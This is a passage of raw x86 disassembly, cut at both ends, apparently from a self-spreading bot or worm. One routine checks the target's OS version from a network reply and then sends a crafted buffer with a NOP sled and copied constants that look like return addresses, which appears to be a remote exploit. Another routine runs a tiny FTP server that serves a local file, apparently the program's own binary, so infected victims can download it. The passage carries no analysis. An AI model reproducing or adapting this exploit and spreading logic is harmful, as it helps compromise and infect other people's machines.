mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_204]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: sub_410B52+56�j
push 89h
push offset dword_41AF50
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: sub_410B52+96�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: sub_410B52+D6�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: sub_410B52+116�j
movsx eax, [ebp+var_7CC]
sub eax, 30h
mov [ebp+var_208], al
movsx eax, [ebp+var_7C8]
sub eax, 30h
mov [ebp+var_4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: sub_410B52+170�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: sub_410B52+1AD�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: sub_410B52+1ED�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz loc_410E71
movsx eax, [ebp+var_4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp+var_B78]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_AF2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp+var_20C]
add eax, 60h
push eax
mov eax, [ebp+var_20C]
lea eax, [ebp+eax+var_AF2]
push eax
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp+var_88E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_882]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_85E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_852]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp+var_82E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call dword_41709C ; Sleep
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: sub_410B52+1FE�j
; sub_410B52+20B�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz short loc_410E85
movsx eax, [ebp+var_4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: sub_410B52+329�j
movsx eax, [ebp+var_208]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: sub_410B52+331�j
push 86h
push offset dword_41B35C
lea eax, [ebp+var_104C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp+var_20C]
push eax
push 90h
lea eax, [ebp+var_FC6]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_BDE]
sub eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and [ebp+var_B7C], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: sub_410B52+3DA�j
mov eax, [ebp+var_B7C]
inc eax
mov [ebp+var_B7C], eax
loc_410F06: ; CODE XREF: sub_410B52+3A5�j
cmp [ebp+var_B7C], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp+var_B7C]
lea eax, [ebp+eax*4+var_BDE]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: sub_410B52+3BB�j
push 20h
push offset dword_41B3E4
lea eax, [ebp+var_B9E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp+var_104C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: sub_410B52+58�j
; sub_410B52+98�j ...
leave
retn
sub_410B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: sub_410B52+265�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: sub_41113B+79B�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset dword_41EBBC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41113B proc near ; DATA XREF: sub_411BBC+156�o
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = byte ptr -540h
var_53C = byte ptr -53Ch
var_538 = byte ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_318 = byte ptr -318h
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
push offset dword_41C6B0
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
mov al, byte_41DEC0
mov [ebp+var_104], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov al, byte_41DEC0
mov [ebp+var_114], al
xor eax, eax
lea edi, [ebp+var_113]
stosd
stosb
and [ebp+var_4], 0
and [ebp+var_118], 0
and [ebp+var_108], 0
loc_4111CC: ; CODE XREF: sub_41113B+10C�j
; sub_41113B+1BD�j ...
push 0EA60h
push [ebp+var_10C]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
lea eax, [ebp+var_318]
push eax
push [ebp+var_10C]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_520], eax
cmp [ebp+var_520], 0
jz short loc_411218
cmp [ebp+var_520], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: sub_41113B+D2�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: sub_41113B+DB�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
lea eax, [ebp+var_318]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_528], eax
cmp [ebp+var_528], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: sub_41113B+10A�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_51C], eax
cmp [ebp+var_51C], 0
jnz short loc_411278
mov [ebp+var_51C], offset byte_41DEC0
loc_411278: ; CODE XREF: sub_41113B+131�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push [ebp+var_528]
call sub_40ED38
pop ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_524]
sub eax, dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov [ebp+var_4], 1
push offset dword_41C698
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_41113B+178�j
mov eax, [ebp+var_524]
sub eax, dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov [ebp+var_118], 1
push offset dword_41C684
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: sub_41113B+1D5�j
cmp [ebp+var_4], 0
jz short loc_41136C
cmp [ebp+var_118], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: sub_41113B+226�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: sub_41113B+22F�j
mov eax, [ebp+var_524]
sub eax, dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset dword_41C670
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: sub_41113B+249�j
mov eax, [ebp+var_524]
sub eax, dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset dword_41C65C
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: sub_41113B+29F�j
mov eax, [ebp+var_524]
sub eax, dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset dword_41C648
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: sub_41113B+2F5�j
mov eax, [ebp+var_524]
sub eax, dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: sub_41113B+34B�j
mov eax, [ebp+var_524]
sub eax, dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset dword_41C620
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: sub_41113B+3A1�j
mov eax, [ebp+var_524]
sub eax, dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_53C]
push eax
lea eax, [ebp+var_538]
push eax
lea eax, [ebp+var_530]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_51C]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, [ebp+var_540]
push eax
movzx eax, [ebp+var_53C]
push eax
movzx eax, [ebp+var_538]
push eax
movzx eax, [ebp+var_530]
push eax
push offset dword_418A50
push 100h
lea eax, [ebp+var_104]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp+var_52C]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp+var_534]
and ecx, 0FFh
or eax, ecx
push eax
push offset dword_418A60
push 6
lea eax, [ebp+var_114]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: sub_41113B+3F7�j
mov eax, [ebp+var_524]
sub eax, dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset dword_41EBBC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_548], eax
cmp [ebp+var_548], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_41113B+51E�j
push 2
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_544], eax
push 0
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_544]
push offset dword_41C5E8
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: sub_41113B+4FA�j
mov eax, [ebp+var_524]
sub eax, dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_54C], eax
cmp [ebp+var_54C], 0
jz short loc_411773
cmp [ebp+var_54C], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: sub_41113B+62D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_41113B+636�j
push offset aRb ; "rb"
push offset dword_41EBBC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_554], eax
cmp [ebp+var_554], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_41113B+65B�j
push 2
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_550], eax
push 0
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B82 ; fclose
pop ecx
push offset dword_41EBBC
push [ebp+var_550]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_54C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_54C]
call sub_40538D
pop ecx
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: sub_41113B+5C1�j
mov eax, [ebp+var_524]
sub eax, dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EB98
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp+var_558], eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_558]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset dword_41DB3C
call sub_40D4AB
add esp, 14h
push 3E8h
call dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: sub_41113B+7A4�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: sub_41113B+74B�j
mov eax, [ebp+var_524]
sub eax, dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: sub_41113B+A5�j
; sub_41113B:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_10C]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
sub_41113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6D8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset dword_41C6CC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6C8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset dword_41C6BC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6B8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
